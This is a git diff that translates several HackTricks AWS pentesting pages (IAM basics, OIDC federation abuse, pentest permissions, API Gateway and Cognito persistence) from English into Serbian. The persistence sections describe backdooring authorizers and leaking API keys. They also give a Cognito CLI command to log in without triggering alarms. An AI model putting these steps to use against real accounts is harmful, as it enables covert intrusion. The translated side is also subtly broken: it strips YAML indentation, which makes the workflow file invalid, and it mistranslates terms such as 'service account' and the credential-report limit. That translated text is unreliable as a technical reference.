-A session policy is a **policy set when a role is assumed** somehow. This will be like an **IAM boundary for that session**: This means that the session policy doesn't grant permissions but **restrict them to the ones indicated in the policy** (being the max permissions the ones the role has).
-
-This is useful for **security meassures**: When an admin is going to assume a very privileged role he could restrict the permission to only the ones indicated in the session policy in case the session gets compromised.
+Politika sesije je **politika postavljena kada se uloga preuzima** na neki način. Ovo će biti kao **IAM granica za tu sesiju**: To znači da politika sesije ne dodeljuje dozvole, već **ograničava ih na one koje su navedene u politici** (maksimalne dozvole su one koje uloga ima).
 
+Ovo je korisno za **bezbednosne mere**: Kada administrator preuzima veoma privilegovanu ulogu, mogao bi da ograniči dozvolu samo na one koje su navedene u politici sesije u slučaju da sesija bude kompromitovana.
 ```bash
 aws sts assume-role \
-    --role-arn  \
-    --role-session-name  \
-    [--policy-arns  ]
-    [--policy ]
+--role-arn  \
+--role-session-name  \
+[--policy-arns  ]
+[--policy ]
 ```
+Napomena da po defaultu **AWS može dodati politike sesije sesijama** koje će biti generisane zbog trećih razloga. Na primer, u [neautentifikovanim cognito pretpostavljenim rolama](../aws-services/aws-cognito-enum/cognito-identity-pools.md#accessing-iam-roles) po defaultu (koristeći poboljšanu autentifikaciju), AWS će generisati **akreditiv sesije sa politikom sesije** koja ograničava usluge kojima sesija može pristupiti [**na sledeću listu**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services).
 
-Note that by default **AWS might add session policies to sessions** that are going to be generated because of third reasons. For example, in [unauthenticated cognito assumed roles](../aws-services/aws-cognito-enum/cognito-identity-pools.md#accessing-iam-roles) by default (using enhanced authentication), AWS will generate **session credentials with a session policy** that limits the services that session can access [**to the following list**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services).
+Stoga, ako se u nekom trenutku suočite sa greškom "... jer nijedna politika sesije ne dozvoljava ...", a uloga ima pristup za izvršenje akcije, to je zato što **postoji politika sesije koja to sprečava**.
 
-Therefore, if at some point you face the error "... because no session policy allows the ...", and the role has access to perform the action, it's because **there is a session policy preventing it**.
+### Identitetna federacija
 
-### Identity Federation
+Identitetna federacija **omogućava korisnicima iz identitetskih provajdera koji su eksterni** za AWS da sigurno pristupaju AWS resursima bez potrebe da dostavljaju AWS korisničke akreditive iz važećeg IAM korisničkog naloga.\
+Primer identitetskog provajdera može biti vaša vlastita korporativna **Microsoft Active Directory** (putem **SAML**) ili **OpenID** usluga (kao što je **Google**). Federisani pristup će tada omogućiti korisnicima unutar njega da pristupaju AWS-u.
 
-Identity federation **allows users from identity providers which are external** to AWS to access AWS resources securely without having to supply AWS user credentials from a valid IAM user account.\
-An example of an identity provider can be your own corporate **Microsoft Active Directory** (via **SAML**) or **OpenID** services (like **Google**). Federated access will then allow the users within it to access AWS.
+Da biste konfigurisali ovo poverenje, generiše se **IAM identitetski provajder (SAML ili OAuth)** koji će **verovati** **drugoj platformi**. Zatim, najmanje jedna **IAM uloga se dodeljuje (verujuća) identitetskom provajderu**. Ako korisnik iz poverene platforme pristupi AWS-u, pristupaće kao pomenuta uloga.
 
-To configure this trust, an **IAM Identity Provider is generated (SAML or OAuth)** that will **trust** the **other platform**. Then, at least one **IAM role is assigned (trusting) to the Identity Provider**. If a user from the trusted platform access AWS, he will be accessing as the mentioned role.
-
-However, you will usually want to give a **different role depending on the group of the user** in the third party platform. Then, several **IAM roles can trust** the third party Identity Provider and the third party platform will be the one allowing users to assume one role or the other.
+Međutim, obično ćete želeti da dodelite **različitu ulogu u zavisnosti od grupe korisnika** na trećoj strani. Tada, nekoliko **IAM uloga može verovati** trećem identitetskom provajderu, a treća platforma će biti ta koja omogućava korisnicima da preuzmu jednu ili drugu ulogu.
 
 

 
-### IAM Identity Center
+### IAM Identitetni Centar
 
-AWS IAM Identity Center (successor to AWS Single Sign-On) expands the capabilities of AWS Identity and Access Management (IAM) to provide a **central plac**e that brings together **administration of users and their access to AWS** accounts and cloud applications.
+AWS IAM Identitetni Centar (naslednik AWS Single Sign-On) proširuje mogućnosti AWS upravljanja identitetom i pristupom (IAM) kako bi pružio **centralno mesto** koje okuplja **administraciju korisnika i njihov pristup AWS** nalozima i cloud aplikacijama.
 
-The login domain is going to be something like `.awsapps.com`.
+Domen za prijavu će biti nešto poput `.awsapps.com`.
 
-To login users, there are 3 identity sources that can be used:
+Da bi se prijavili korisnici, postoje 3 izvora identiteta koji se mogu koristiti:
 
-- Identity Center Directory: Regular AWS users
-- Active Directory: Supports different connectors
-- External Identity Provider: All users and groups come from an external Identity Provider (IdP)
+- Identitetni Centar Direktorijum: Redovni AWS korisnici
+- Active Directory: Podržava različite konektore
+- Eksterni identitetski provajder: Svi korisnici i grupe dolaze iz eksternog identitetskog provajdera (IdP)
 
 

 
-In the simplest case of Identity Center directory, the **Identity Center will have a list of users & groups** and will be able to **assign policies** to them to **any of the accounts** of the organization.
+U najjednostavnijem slučaju direktorijuma Identitetnog Centra, **Identitetni Centar će imati listu korisnika i grupa** i moći će da **dodeli politike** njima za **bilo koji od naloga** organizacije.
 
-In order to give access to a Identity Center user/group to an account a **SAML Identity Provider trusting the Identity Center will be created**, and a **role trusting the Identity Provider with the indicated policies will be created** in the destination account.
+Da biste dali pristup korisniku/grupi Identitetnog Centra nalogu, **biće kreiran SAML identitetski provajder koji veruje Identitetnom Centru**, a **uloga koja veruje identitetskom provajderu sa navedenim politikama biće kreirana** u odredišnom nalogu.
 
 #### AwsSSOInlinePolicy
 
-It's possible to **give permissions via inline policies to roles created via IAM Identity Center**. The roles created in the accounts being given **inline policies in AWS Identity Center** will have these permissions in an inline policy called **`AwsSSOInlinePolicy`**.
+Moguće je **dati dozvole putem inline politika rolama kreiranim putem IAM Identitetnog Centra**. Uloge kreirane u nalozima koje dobijaju **inline politike u AWS Identitetnom Centru** će imati ove dozvole u inline politici pod nazivom **`AwsSSOInlinePolicy`**.
 
-Therefore, even if you see 2 roles with an inline policy called **`AwsSSOInlinePolicy`**, it **doesn't mean it has the same permissions**.
+Stoga, čak i ako vidite 2 uloge sa inline politikom pod nazivom **`AwsSSOInlinePolicy`**, to **ne znači da imaju iste dozvole**.
 
 ### Cross Account Trusts and Roles
 
-**A user** (trusting) can create a Cross Account Role with some policies and then, **allow another user** (trusted) to **access his account** but only **having the access indicated in the new role policies**. To create this, just create a new Role and select Cross Account Role. Roles for Cross-Account Access offers two options. Providing access between AWS accounts that you own, and providing access between an account that you own and a third party AWS account.\
-It's recommended to **specify the user who is trusted and not put some generic thing** because if not, other authenticated users like federated users will be able to also abuse this trust.
+**Korisnik** (verujući) može kreirati Cross Account ulogu sa nekim politikama i zatim **dozvoliti drugom korisniku** (verovanom) da **pristupi njegovom nalogu** ali samo **imajući pristup naznačen u novim politikama uloge**. Da biste to kreirali, jednostavno kreirajte novu ulogu i izaberite Cross Account ulogu. Uloge za pristup između naloga nude dve opcije. Pružanje pristupa između AWS naloga koje posedujete, i pružanje pristupa između naloga koji posedujete i trećeg AWS naloga.\
+Preporučuje se da **precizirate korisnika koji je poveren i ne stavljate neku generičku stvar** jer u suprotnom, drugi autentifikovani korisnici poput federisanih korisnika će takođe moći da zloupotrebe ovo poverenje.
 
 ### AWS Simple AD
 
-Not supported:
+Nije podržano:
 
-- Trust Relations
-- AD Admin Center
-- Full PS API support
-- AD Recycle Bin
-- Group Managed Service Accounts
-- Schema Extensions
-- No Direct access to OS or Instances
+- Odnos poverenja
+- AD Admin Centar
+- Puna PS API podrška
+- AD Kanta za reciklažu
+- Grupa upravljanih servisnih naloga
+- Proširenja šeme
+- Nema direktan pristup OS-u ili instancama
 
-#### Web Federation or OpenID Authentication
+#### Web Federacija ili OpenID Autentifikacija
 
-The app uses the AssumeRoleWithWebIdentity to create temporary credentials. However, this doesn't grant access to the AWS console, just access to resources within AWS.
+Aplikacija koristi AssumeRoleWithWebIdentity za kreiranje privremenih akreditiva. Međutim, ovo ne daje pristup AWS konzoli, samo pristup resursima unutar AWS-a.
 
-### Other IAM options
+### Druge IAM opcije
 
-- You can **set a password policy setting** options like minimum length and password requirements.
-- You can **download "Credential Report"** with information about current credentials (like user creation time, is password enabled...). You can generate a credential report as often as once every **four hours**.
+- Možete **postaviti podešavanje politike lozinke** kao što su minimalna dužina i zahtevi za lozinku.
+- Možete **preuzeti "Izveštaj o akreditivima"** sa informacijama o trenutnim akreditivima (kao što su vreme kreiranja korisnika, da li je lozinka omogućena...). Možete generisati izveštaj o akreditivima koliko često želite, čak i jednom svaka **četiri sata**.
 
-AWS Identity and Access Management (IAM) provides **fine-grained access control** across all of AWS. With IAM, you can specify **who can access which services and resources**, and under which conditions. With IAM policies, you manage permissions to your workforce and systems to **ensure least-privilege permissions**.
+AWS upravljanje identitetom i pristupom (IAM) pruža **fino podešavanje kontrole pristupa** širom celog AWS-a. Sa IAM-om, možete precizirati **ko može pristupiti kojim uslugama i resursima**, i pod kojim uslovima. Sa IAM politikama, upravljate dozvolama za vašu radnu snagu i sisteme kako biste **osigurali dozvole sa najmanjim privilegijama**.
 
-### IAM ID Prefixes
+### IAM ID Prefiksi
 
-In [**this page**](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html#identifiers-unique-ids) you can find the **IAM ID prefixe**d of keys depending on their nature:
+Na [**ovoj stranici**](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html#identifiers-unique-ids) možete pronaći **IAM ID prefikse** ključeva u zavisnosti od njihove prirode:
 
-| ABIA | [AWS STS service bearer token](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_bearer.html)                                                                                                          |
+| ABIA | [AWS STS servisni token nosilac](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_bearer.html)                                                                                                          |
 | ---- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
-| ACCA | Context-specific credential                                                                                                                                                                                          |
-| AGPA | User group                                                                                                                                                                                                           |
-| AIDA | IAM user                                                                                                                                                                                                             |
-| AIPA | Amazon EC2 instance profile                                                                                                                                                                                          |
-| AKIA | Access key                                                                                                                                                                                                           |
-| ANPA | Managed policy                                                                                                                                                                                                       |
-| ANVA | Version in a managed policy                                                                                                                                                                                          |
-| APKA | Public key                                                                                                                                                                                                           |
-| AROA | Role                                                                                                                                                                                                                 |
-| ASCA | Certificate                                                                                                                                                                                                          |
-| ASIA | [Temporary (AWS STS) access key IDs](https://docs.aws.amazon.com/STS/latest/APIReference/API_Credentials.html) use this prefix, but are unique only in combination with the secret access key and the session token. |
+| ACCA | Kontekstualni akreditiv                                                                                                                                                                                          |
+| AGPA | Korisnička grupa                                                                                                                                                                                                           |
+| AIDA | IAM korisnik                                                                                                                                                                                                             |
+| AIPA | Amazon EC2 profil instance                                                                                                                                                                                          |
+| AKIA | Pristupni ključ                                                                                                                                                                                                           |
+| ANPA | Upravljana politika                                                                                                                                                                                                       |
+| ANVA | Verzija u upravljanoj politici                                                                                                                                                                                          |
+| APKA | Javni ključ                                                                                                                                                                                                           |
+| AROA | Uloga                                                                                                                                                                                                                 |
+| ASCA | Sertifikat                                                                                                                                                                                                          |
+| ASIA | [Privremeni (AWS STS) pristupni ključ ID-ovi](https://docs.aws.amazon.com/STS/latest/APIReference/API_Credentials.html) koriste ovaj prefiks, ali su jedinstveni samo u kombinaciji sa tajnim pristupnim ključem i tokenom sesije. |
 
-### Recommended permissions to audit accounts
+### Preporučene dozvole za reviziju naloga
 
-The following privileges grant various read access of metadata:
+Sledeće privilegije daju različit pristup metapodacima:
 
 - `arn:aws:iam::aws:policy/SecurityAudit`
 - `arn:aws:iam::aws:policy/job-function/ViewOnlyAccess`
@@ -336,14 +326,13 @@ The following privileges grant various read access of metadata:
 - `directconnect:DescribeConnections`
 - `dynamodb:ListTables`
 
-## Misc
+## Razno
 
-### CLI Authentication
-
-In order for a regular user authenticate to AWS via CLI you need to have **local credentials**. By default you can configure them **manually** in `~/.aws/credentials` or by **running** `aws configure`.\
-In that file you can have more than one profile, if **no profile** is specified using the **aws cli**, the one called **`[default]`** in that file will be used.\
-Example of credentials file with more than 1 profile:
+### CLI Autentifikacija
 
+Da bi regularni korisnik autentifikovao AWS putem CLI, potrebno je imati **lokalne akreditive**. Po defaultu, možete ih konfigurisati **ručno** u `~/.aws/credentials` ili **pokretanjem** `aws configure`.\
+U toj datoteci možete imati više od jednog profila, ako **nije specificiran profil** koristeći **aws cli**, koristiće se onaj nazvan **`[default]`** u toj datoteci.\
+Primer datoteke akreditiva sa više od 1 profila:
 ```
 [default]
 aws_access_key_id = AKIA5ZDCUJHF83HDTYUT
@@ -354,12 +343,10 @@ aws_access_key_id = AKIA8YDCu7TGTR356SHYT
 aws_secret_access_key = uOcdhof683fbOUGFYEQuR2EIHG34UY987g6ff7
 region = eu-west-2
 ```
+Ako treba da pristupite **različitim AWS nalozima** i vašem profilu je dato pravo da **pretpostavi ulogu unutar tih naloga**, ne morate ručno pozivati STS svaki put (`aws sts assume-role --role-arn  --role-session-name sessname`) i konfigurisati akreditive.
 
-If you need to access **different AWS accounts** and your profile was given access to **assume a role inside those accounts**, you don't need to call manually STS every time (`aws sts assume-role --role-arn  --role-session-name sessname`) and configure the credentials.
-
-You can use the `~/.aws/config` file to[ **indicate which roles to assume**](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-role.html), and then use the `--profile` param as usual (the `assume-role` will be performed in a transparent way for the user).\
-A config file example:
-
+Možete koristiti `~/.aws/config` datoteku da **naznačite koje uloge da pretpostavite** i zatim koristiti `--profile` parametar kao i obično (pretpostavljanje uloge će se izvršiti na transparentan način za korisnika).\
+Primer konfiguracione datoteke:
 ```
 [profile acc2]
 region=eu-west-2
@@ -368,23 +355,16 @@ role_session_name = 
 source_profile = 
 sts_regional_endpoints = regional
 ```
-
-With this config file you can then use aws cli like:
-
+Sa ovom konfiguracionom datotekom možete koristiti aws cli kao:
 ```
 aws --profile acc2 ...
 ```
+Ako tražite nešto **slično** ovome, ali za **pregledač**, možete proveriti **ekstenziju** [**AWS Extend Switch Roles**](https://chrome.google.com/webstore/detail/aws-extend-switch-roles/jpmkfafbacpgapdghgdpembnojdlgkdl?hl=en).
 
-If you are looking for something **similar** to this but for the **browser** you can check the **extension** [**AWS Extend Switch Roles**](https://chrome.google.com/webstore/detail/aws-extend-switch-roles/jpmkfafbacpgapdghgdpembnojdlgkdl?hl=en).
-
-## References
+## Reference
 
 - [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html)
 - [https://aws.amazon.com/iam/](https://aws.amazon.com/iam/)
 - [https://docs.aws.amazon.com/singlesignon/latest/userguide/what-is.html](https://docs.aws.amazon.com/singlesignon/latest/userguide/what-is.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md b/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md
index 73ae6b448..598b9a8c0 100644
--- a/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md
+++ b/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md
@@ -1,87 +1,84 @@
-# AWS - Federation Abuse
+# AWS - Zloupotreba federacije
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## SAML
 
-For info about SAML please check:
+Za informacije o SAML-u, molimo proverite:
 
 {{#ref}}
 https://book.hacktricks.xyz/pentesting-web/saml-attacks
 {{#endref}}
 
-In order to configure an **Identity Federation through SAML** you just need to provide a **name** and the **metadata XML** containing all the SAML configuration (**endpoints**, **certificate** with public key)
+Da biste konfigurisali **Identitetsku federaciju putem SAML-a**, potrebno je da obezbedite **ime** i **metadata XML** koji sadrži svu SAML konfiguraciju (**endpoints**, **sertifikat** sa javnim ključem)
 
-## OIDC - Github Actions Abuse
+## OIDC - Zloupotreba Github akcija
 
-In order to add a github action as Identity provider:
-
-1. For _Provider type_, select **OpenID Connect**.
-2. For _Provider URL_, enter `https://token.actions.githubusercontent.com`
-3. Click on _Get thumbprint_ to get the thumbprint of the provider
-4. For _Audience_, enter `sts.amazonaws.com`
-5. Create a **new role** with the **permissions** the github action need and a **trust policy** that trust the provider like:
-   - ```json
-     {
-       "Version": "2012-10-17",
-       "Statement": [
-         {
-           "Effect": "Allow",
-           "Principal": {
-             "Federated": "arn:aws:iam::0123456789:oidc-provider/token.actions.githubusercontent.com"
-           },
-           "Action": "sts:AssumeRoleWithWebIdentity",
-           "Condition": {
-             "StringEquals": {
-               "token.actions.githubusercontent.com:sub": [
-                 "repo:ORG_OR_USER_NAME/REPOSITORY:pull_request",
-                 "repo:ORG_OR_USER_NAME/REPOSITORY:ref:refs/heads/main"
-               ],
-               "token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
-             }
-           }
-         }
-       ]
-     }
-     ```
-6. Note in the previous policy how only a **branch** from **repository** of an **organization** was authorized with a specific **trigger**.
-7. The **ARN** of the **role** the github action is going to be able to **impersonate** is going to be the "secret" the github action needs to know, so **store** it inside a **secret** inside an **environment**.
-8. Finally use a github action to configure the AWS creds to be used by the workflow:
+Da biste dodali github akciju kao provajdera identiteta:
 
+1. Za _Tip provajdera_, izaberite **OpenID Connect**.
+2. Za _URL provajdera_, unesite `https://token.actions.githubusercontent.com`
+3. Kliknite na _Preuzmi otisak_ da biste dobili otisak provajdera
+4. Za _Publiku_, unesite `sts.amazonaws.com`
+5. Kreirajte **novu ulogu** sa **dozvolama** koje github akcija zahteva i **politiku poverenja** koja veruje provajderu kao:
+- ```json
+{
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"Federated": "arn:aws:iam::0123456789:oidc-provider/token.actions.githubusercontent.com"
+},
+"Action": "sts:AssumeRoleWithWebIdentity",
+"Condition": {
+"StringEquals": {
+"token.actions.githubusercontent.com:sub": [
+"repo:ORG_OR_USER_NAME/REPOSITORY:pull_request",
+"repo:ORG_OR_USER_NAME/REPOSITORY:ref:refs/heads/main"
+],
+"token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
+}
+}
+}
+]
+}
+```
+6. Obratite pažnju u prethodnoj politici kako je samo jedna **grana** iz **repozitorijuma** **organizacije** autorizovana sa specifičnim **okidačem**.
+7. **ARN** uloge koju github akcija može da **imitira** biće "tajna" koju github akcija treba da zna, pa je **čuvajte** unutar **tajne** unutar **okruženja**.
+8. Na kraju, koristite github akciju da konfigurišete AWS kredencijale koji će se koristiti u radnom toku:
 ```yaml
 name: "test AWS Access"
 
 # The workflow should only trigger on pull requests to the main branch
 on:
-  pull_request:
-    branches:
-      - main
+pull_request:
+branches:
+- main
 
 # Required to get the ID Token that will be used for OIDC
 permissions:
-  id-token: write
-  contents: read # needed for private repos to checkout
+id-token: write
+contents: read # needed for private repos to checkout
 
 jobs:
-  aws:
-    runs-on: ubuntu-latest
-    steps:
-      - name: Checkout
-        uses: actions/checkout@v3
+aws:
+runs-on: ubuntu-latest
+steps:
+- name: Checkout
+uses: actions/checkout@v3
 
-      - name: Configure AWS Credentials
-        uses: aws-actions/configure-aws-credentials@v1
-        with:
-          aws-region: eu-west-1
-          role-to-assume:${{ secrets.READ_ROLE }}
-          role-session-name: OIDCSession
+- name: Configure AWS Credentials
+uses: aws-actions/configure-aws-credentials@v1
+with:
+aws-region: eu-west-1
+role-to-assume:${{ secrets.READ_ROLE }}
+role-session-name: OIDCSession
 
-      - run: aws sts get-caller-identity
-        shell: bash
+- run: aws sts get-caller-identity
+shell: bash
 ```
-
-## OIDC - EKS Abuse
-
+## OIDC - EKS Zloupotreba
 ```bash
 # Crate an EKS cluster (~10min)
 eksctl create cluster --name demo --fargate
@@ -91,43 +88,34 @@ eksctl create cluster --name demo --fargate
 # Create an Identity Provider for an EKS cluster
 eksctl utils associate-iam-oidc-provider --cluster Testing --approve
 ```
-
-It's possible to generate **OIDC providers** in an **EKS** cluster simply by setting the **OIDC URL** of the cluster as a **new Open ID Identity provider**. This is a common default policy:
-
+Moguće je generisati **OIDC provajdere** u **EKS** klasteru jednostavno postavljanjem **OIDC URL-a** klastera kao **novog Open ID provajdera identiteta**. Ovo je uobičajena podrazumevana politika:
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Effect": "Allow",
-      "Principal": {
-        "Federated": "arn:aws:iam::123456789098:oidc-provider/oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B"
-      },
-      "Action": "sts:AssumeRoleWithWebIdentity",
-      "Condition": {
-        "StringEquals": {
-          "oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:aud": "sts.amazonaws.com"
-        }
-      }
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"Federated": "arn:aws:iam::123456789098:oidc-provider/oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B"
+},
+"Action": "sts:AssumeRoleWithWebIdentity",
+"Condition": {
+"StringEquals": {
+"oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:aud": "sts.amazonaws.com"
+}
+}
+}
+]
 }
 ```
+Ova politika ispravno ukazuje da **samo** **EKS klaster** sa **id** `20C159CDF6F2349B68846BEC03BE031B` može preuzeti ulogu. Međutim, ne ukazuje koja usluga može preuzeti, što znači da **BILO koja usluga sa web identitet tokenom** će moći da **preuzme** ulogu.
 
-This policy is correctly indicating than **only** the **EKS cluster** with **id** `20C159CDF6F2349B68846BEC03BE031B` can assume the role. However, it's not indicting which service account can assume it, which means that A**NY service account with a web identity token** is going to be **able to assume** the role.
-
-In order to specify **which service account should be able to assume the role,** it's needed to specify a **condition** where the **service account name is specified**, such as:
-
+Da bi se odredilo **koja usluga bi trebala da može da preuzme ulogu,** potrebno je odrediti **uslov** gde je **ime usluge navedeno**, kao što je:
 ```bash
 "oidc.eks.region-code.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:sub": "system:serviceaccount:default:my-service-account",
 ```
-
 ## References
 
 - [https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/](https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md b/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md
index 28868b9f1..3022100f1 100644
--- a/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md
+++ b/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md
@@ -1,21 +1,17 @@
-# AWS - Permissions for a Pentest
+# AWS - Dozvole za Pentest
 
 {{#include ../../banners/hacktricks-training.md}}
 
-These are the permissions you need on each AWS account you want to audit to be able to run all the proposed AWS audit tools:
+Ovo su dozvole koje su vam potrebne na svakom AWS nalogu koji želite da auditujete kako biste mogli da pokrenete sve predložene AWS alate za audit:
 
-- The default policy **arn:aws:iam::aws:policy/**[**ReadOnlyAccess**](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/ReadOnlyAccess)
-- To run [aws_iam_review](https://github.com/carlospolop/aws_iam_review) you also need the permissions:
-  - **access-analyzer:List\***
-  - **access-analyzer:Get\***
-  - **iam:CreateServiceLinkedRole**
-  - **access-analyzer:CreateAnalyzer**
-    - Optional if the client generates the analyzers for you, but usually it's easier just to ask for this permission)
-  - **access-analyzer:DeleteAnalyzer**
-    - Optional if the client removes the analyzers for you, but usually it's easier just to ask for this permission)
+- Podrazumevana politika **arn:aws:iam::aws:policy/**[**ReadOnlyAccess**](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/ReadOnlyAccess)
+- Da biste pokrenuli [aws_iam_review](https://github.com/carlospolop/aws_iam_review) takođe su vam potrebne dozvole:
+- **access-analyzer:List\***
+- **access-analyzer:Get\***
+- **iam:CreateServiceLinkedRole**
+- **access-analyzer:CreateAnalyzer**
+- Opcionalno ako klijent generiše analize za vas, ali obično je lakše samo zatražiti ovu dozvolu)
+- **access-analyzer:DeleteAnalyzer**
+- Opcionalno ako klijent uklanja analize za vas, ali obično je lakše samo zatražiti ovu dozvolu)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/README.md b/src/pentesting-cloud/aws-security/aws-persistence/README.md
index f3b45c4d3..ba1389e42 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/README.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/README.md
@@ -1,6 +1 @@
-# AWS - Persistence
-
-
-
-
-
+# AWS - Persistencija
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md
index 6d2b0ec35..ef14b6b10 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md
@@ -4,7 +4,7 @@
 
 ## API Gateway
 
-For more information go to:
+Za više informacija idite na:
 
 {{#ref}}
 ../aws-services/aws-api-gateway-enum.md
@@ -12,25 +12,21 @@ For more information go to:
 
 ### Resource Policy
 
-Modify the resource policy of the API gateway(s) to grant yourself access to them
+Izmenite politiku resursa API gateway-a kako biste sebi omogućili pristup.
 
 ### Modify Lambda Authorizers
 
-Modify the code of lambda authorizers to grant yourself access to all the endpoints.\
-Or just remove the use of the authorizer.
+Izmenite kod lambda autorizatora kako biste sebi omogućili pristup svim krajnjim tačkama.\
+Ili jednostavno uklonite korišćenje autorizatora.
 
 ### IAM Permissions
 
-If a resource is using IAM authorizer you could give yourself access to it modifying IAM permissions.\
-Or just remove the use of the authorizer.
+Ako resurs koristi IAM autorizator, možete sebi omogućiti pristup izmenom IAM dozvola.\
+Ili jednostavno uklonite korišćenje autorizatora.
 
 ### API Keys
 
-If API keys are used, you could leak them to maintain persistence or even create new ones.\
-Or just remove the use of API keys.
+Ako se koriste API ključevi, možete ih procuriti kako biste održali postojanost ili čak kreirati nove.\
+Ili jednostavno uklonite korišćenje API ključeva.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md
index e2e037e53..1f9aadbca 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md
@@ -4,7 +4,7 @@
 
 ## Cognito
 
-For more information, access:
+Za više informacija, pristupite:
 
 {{#ref}}
 ../aws-services/aws-cognito-enum/
@@ -12,16 +12,16 @@ For more information, access:
 
 ### User persistence
 
-Cognito is a service that allows to give roles to unauthenticated and authenticated users and to control a directory of users. Several different configurations can be altered to maintain some persistence, like:
+Cognito je servis koji omogućava dodeljivanje uloga neautentifikovanim i autentifikovanim korisnicima i kontrolu direktorijuma korisnika. Nekoliko različitih konfiguracija može biti izmenjeno kako bi se održala neka postojanost, kao što su:
 
-- **Adding a User Pool** controlled by the user to an Identity Pool
-- Give an **IAM role to an unauthenticated Identity Pool and allow Basic auth flow**
-  - Or to an **authenticated Identity Pool** if the attacker can login
-  - Or **improve the permissions** of the given roles
-- **Create, verify & privesc** via attributes controlled users or new users in a **User Pool**
-- **Allowing external Identity Providers** to login in a User Pool or in an Identity Pool
+- **Dodavanje User Pool-a** koji kontroliše korisnik u Identity Pool
+- Dodeljivanje **IAM uloge neautentifikovanom Identity Pool-u i omogućavanje Basic auth flow**
+- Ili **autentifikovanom Identity Pool-u** ako napadač može da se prijavi
+- Ili **poboljšanje dozvola** datih uloga
+- **Kreiranje, verifikacija & privesc** putem atributima kontrolisanih korisnika ili novih korisnika u **User Pool-u**
+- **Omogućavanje eksternim Identity Provider-ima** da se prijave u User Pool ili u Identity Pool
 
-Check how to do these actions in
+Proverite kako da izvršite ove akcije u
 
 {{#ref}}
 ../aws-privilege-escalation/aws-cognito-privesc.md
@@ -29,18 +29,12 @@ Check how to do these actions in
 
 ### `cognito-idp:SetRiskConfiguration`
 
-An attacker with this privilege could modify the risk configuration to be able to login as a Cognito user **without having alarms being triggered**. [**Check out the cli**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/set-risk-configuration.html) to check all the options:
-
+Napadač sa ovom privilegijom mogao bi da izmeni konfiguraciju rizika kako bi mogao da se prijavi kao Cognito korisnik **bez aktiviranja alarma**. [**Proverite cli**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/set-risk-configuration.html) da biste proverili sve opcije:
 ```bash
 aws cognito-idp set-risk-configuration --user-pool-id  --compromised-credentials-risk-configuration EventFilter=SIGN_UP,Actions={EventAction=NO_ACTION}
 ```
-
-By default this is disabled:
+Podrazumevano je ovo onemogućeno:
 
 

 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md
index 75a824e73..12a47c1cf 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md
@@ -1,67 +1,59 @@
-# AWS - DynamoDB Persistence
+# AWS - DynamoDB Persistencija
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ### DynamoDB
 
-For more information access:
+Za više informacija pristupite:
 
 {{#ref}}
